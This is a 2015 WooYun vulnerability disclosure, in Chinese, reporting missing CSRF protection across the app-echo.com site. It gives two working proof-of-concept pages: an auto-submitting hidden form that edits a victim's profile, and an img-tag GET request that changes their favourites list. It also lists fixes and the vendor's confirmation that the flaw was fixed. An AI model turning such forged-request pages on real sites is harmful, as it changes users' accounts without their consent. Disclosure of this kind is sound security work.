echo回声全站点多处功能设计缺陷导致跨站请求伪造(CSRF)#1 | wooyun-2015-0131466

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0131466

漏洞标题：

echo回声全站点多处功能设计缺陷导致跨站请求伪造(CSRF)#1

漏洞详情

披露状态：

2015-08-05：细节已通知厂商并且等待厂商处理中
2015-08-06：厂商已经确认，细节仅向厂商公开
2015-08-06：厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

echo回声全站点多处功能设计缺陷导致跨站请求伪造(CSRF)#1
全站点没有看到任何关于CSRF的防御，所以本次仅列举几个敏感操作。

详细说明：

修改个人资料poc：

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=GB2312">
<title>CSRF POC</title>
</head>
<body>
<form action="http://www.app-echo.com/user/edit" method="post">
<input type="hidden" name="edit-user[name]" value="****"/>
<input type="hidden" name="edit-user[avatar]" value=" "/>
<input type="hidden" name="edit-user[gender]" value="0"/>
<input type="hidden" name="edit-user[constellation]" value="0"/>
<input type="hidden" name="edit-user[city]" value=" "/>
<input type="hidden" name="edit-user[intro]" value="csrf"/>
</form>
<script> 
 document.forms[0].submit();
</script> 
</body>
</html>

修改收藏列表poc：

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
	<title>get csrf</title>
</head>
<body>
<img src="http://www.app-echo.com/sound/like?id=177304">
</body>
</html>

漏洞证明：

修改个人资料：

修改收藏列表（GET型CSRF）：

修复方案：

1.验证码被认为是对抗CSRF攻击最简洁有效的防御方法。
2.Referer Check.
3.Anti CSRF Token.

版权声明：转载请注明来源安然意境@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：2

确认时间：2015-08-06 11:36

厂商回复：

感谢提交

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源安然意境@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 安然意境@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

版权声明：转载请注明来源安然意境@乌云